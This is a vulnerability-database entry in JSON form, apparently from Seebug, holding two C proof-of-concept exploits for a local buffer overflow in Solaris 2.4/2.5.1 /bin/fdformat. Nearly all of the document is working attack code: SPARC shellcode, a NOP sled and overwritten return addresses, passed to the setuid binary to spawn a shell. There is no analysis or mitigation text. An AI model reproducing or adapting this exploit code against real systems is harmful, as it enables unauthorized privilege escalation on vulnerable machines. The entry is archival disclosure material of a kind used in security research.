Description
No description provided by source.
{"sourceData": "\n ---------------------------\u00a0lion24.c\u00a0---------------------------------\r\n/*\r\nSolaris\u00a02.4\r\n*/\r\n\r\n\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0#define\u00a0BUF_LENGTH\u00a0264\r\n\u00a0\u00a0\u00a0#define\u00a0EXTRA\u00a036\r\n\u00a0\u00a0\u00a0#define\u00a0STACK_OFFSET\u00a0-56\r\n\u00a0\u00a0\u00a0#define\u00a0SPARC_NOP\u00a00xa61cc013\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_char\u00a0sparc_shellcode[]\u00a0=\r\n\r\n\u00a0\u00a0\u00a0"\\x2d\\x0b\\xd8\\x9a\\xac\\x15\\xa1\\x6e\\x2f\\x0b\\xda\\xdc\\xae\\x15\\xe3\\x68"\r\n\u00a0\u00a0\u00a0"\\x90\\x0b\\x80\\x0e\\x92\\x03\\xa0\\x0c\\x94\\x1a\\x80\\x0a\\x9c\\x03\\xa0\\x14"\r\n\u00a0\u00a0\u00a0"\\xec\\x3b\\xbf\\xec\\xc0\\x23\\xbf\\xf4\\xdc\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc"\r\n\u00a0\u00a0\u00a0"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01"\r\n\u00a0\u00a0\u00a0"\\x91\\xd0\\x20\\x08"\r\n\u00a0\u00a0\u00a0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_long\u00a0get_sp(void)\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0__asm__("mov\u00a0%sp,%i0\u00a0\\n");\r\n\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0void\u00a0main(int\u00a0argc,\u00a0char\u00a0*argv[])\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0char\u00a0buf[BUF_LENGTH\u00a0+\u00a0EXTRA\u00a0+\u00a08];\r\n\u00a0\u00a0\u00a0long\u00a0targ_addr;\r\n\u00a0\u00a0\u00a0u_long\u00a0*long_p;\r\n\u00a0\u00a0\u00a0u_char\u00a0*char_p;\r\n\u00a0\u00a0\u00a0int\u00a0i,\u00a0code_length\u00a0=\u00a0strlen(sparc_shellcode),dso=0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0if(argc\u00a0>\u00a01)\u00a0dso=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=(u_long\u00a0*)\u00a0buf\u00a0;\r\n\u00a0\u00a0\u00a0targ_addr\u00a0=\u00a0get_sp()\u00a0-\u00a0STACK_OFFSET\u00a0-\u00a0dso;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0(BUF_LENGTH\u00a0-\u00a0code_length)\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=\u00a0SPARC_NOP;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0char_p\u00a0=\u00a0(u_char\u00a0*)\u00a0long_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0code_length;\u00a0i++)\r\n\u00a0\u00a0\u00a0*char_p++\u00a0=\u00a0sparc_shellcode[i];\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=\u00a0(u_long\u00a0*)\u00a0char_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0EXTRA\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=targ_addr;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0printf("Jumping\u00a0to\u00a0address\u00a00x%lx\u00a0B[%d]\u00a0E[%d]\u00a0SO[%d]\\n",\r\n\u00a0\u00a0\u00a0targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);\r\n\u00a0\u00a0\u00a0execl("/bin/fdformat",\u00a0"fdformat\u00a0\u00a0\u00a0",\u00a0&buf[0],(char\u00a0*)\u00a00);\r\n\u00a0\u00a0\u00a0perror("execl\u00a0failed");\r\n\u00a0\u00a0\u00a0}\r\n------------------------------\u00a0end\u00a0of\u00a0lion24.c\u00a0--------------------------\r\n\r\n--------------------------------\u00a0lion25.c\u00a0------------------------------\r\n/*\u00a0\r\nSolaris\u00a02.5.1\u00a0-\u00a0this\u00a0exploited\u00a0was\u00a0compiled\u00a0on\u00a0Solaris2.4\u00a0and\u00a0tested\u00a0on\r\n2.5.1\r\n*/\r\n\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0#include\u00a0\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0#define\u00a0BUF_LENGTH\u00a0364\r\n\u00a0\u00a0\u00a0#define\u00a0EXTRA\u00a0400\r\n\u00a0\u00a0\u00a0#define\u00a0STACK_OFFSET\u00a0704\r\n\u00a0\u00a0\u00a0#define\u00a0SPARC_NOP\u00a00xa61cc013\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_char\u00a0sparc_shellcode[]\u00a0=\r\n\r\n\u00a0\u00a0\u00a0"\\x2d\\x0b\\xd8\\x9a\\xac\\x15\\xa1\\x6e\\x2f\\x0b\\xda\\xdc\\xae\\x15\\xe3\\x68"\r\n\u00a0\u00a0\u00a0"\\x90\\x0b\\x80\\x0e\\x92\\x03\\xa0\\x0c\\x94\\x1a\\x80\\x0a\\x9c\\x03\\xa0\\x14"\r\n\u00a0\u00a0\u00a0"\\xec\\x3b\\xbf\\xec\\xc0\\x23\\xbf\\xf4\\xdc\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc"\r\n\u00a0\u00a0\u00a0"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01"\r\n\u00a0\u00a0\u00a0"\\x91\\xd0\\x20\\x08"\r\n\u00a0\u00a0\u00a0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0u_long\u00a0get_sp(void)\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0__asm__("mov\u00a0%sp,%i0\u00a0\\n");\r\n\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0void\u00a0main(int\u00a0argc,\u00a0char\u00a0*argv[])\r\n\u00a0\u00a0\u00a0{\r\n\u00a0\u00a0\u00a0char\u00a0buf[BUF_LENGTH\u00a0+\u00a0EXTRA\u00a0+\u00a08];\r\n\u00a0\u00a0\u00a0long\u00a0targ_addr;\r\n\u00a0\u00a0\u00a0u_long\u00a0*long_p;\r\n\u00a0\u00a0\u00a0u_char\u00a0*char_p;\r\n\u00a0\u00a0\u00a0int\u00a0i,\u00a0code_length\u00a0=\u00a0strlen(sparc_shellcode),dso=0;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0if(argc\u00a0>\u00a01)\u00a0dso=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=(u_long\u00a0*)\u00a0buf\u00a0;\r\n\u00a0\u00a0\u00a0targ_addr\u00a0=\u00a0get_sp()\u00a0-\u00a0STACK_OFFSET\u00a0-\u00a0dso;\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0(BUF_LENGTH\u00a0-\u00a0code_length)\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=\u00a0SPARC_NOP;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0char_p\u00a0=\u00a0(u_char\u00a0*)\u00a0long_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0code_length;\u00a0i++)\r\n\u00a0\u00a0\u00a0*char_p++\u00a0=\u00a0sparc_shellcode[i];\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0long_p\u00a0=\u00a0(u_long\u00a0*)\u00a0char_p;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0for\u00a0(i\u00a0=\u00a00;\u00a0i\u00a0<\u00a0EXTRA\u00a0/\u00a0sizeof(u_long);\u00a0i++)\r\n\u00a0\u00a0\u00a0*long_p++\u00a0=targ_addr;\r\n\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0printf("Jumping\u00a0to\u00a0address\u00a00x%lx\u00a0B[%d]\u00a0E[%d]\u00a0SO[%d]\\n",\r\n\u00a0\u00a0\u00a0targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);\r\n\u00a0\u00a0\u00a0execl("/bin/fdformat",\u00a0"fdformat",\u00a0&\u00a0buf[1],(char\u00a0*)\u00a00);\r\n\u00a0\u00a0\u00a0perror("execl\u00a0failed");\r\n\u00a0\u00a0\u00a0}\r\n\r\n---------------------------\u00a0end\u00a0of\u00a0lion25.c\u00a0-------------------------------\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7728", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-7728", "type": "seebug", "viewCount": 5, "references": [], "lastseen": "2017-11-19T21:52:01", "published": "2007-12-26T00:00:00", "cvelist": [], "id": "SSV:7728", "enchantments_done": [], "modified": "2007-12-26T00:00:00", "title": "Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645317471, "score": 1659785532, "epss": 1678851499}}
{}
Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits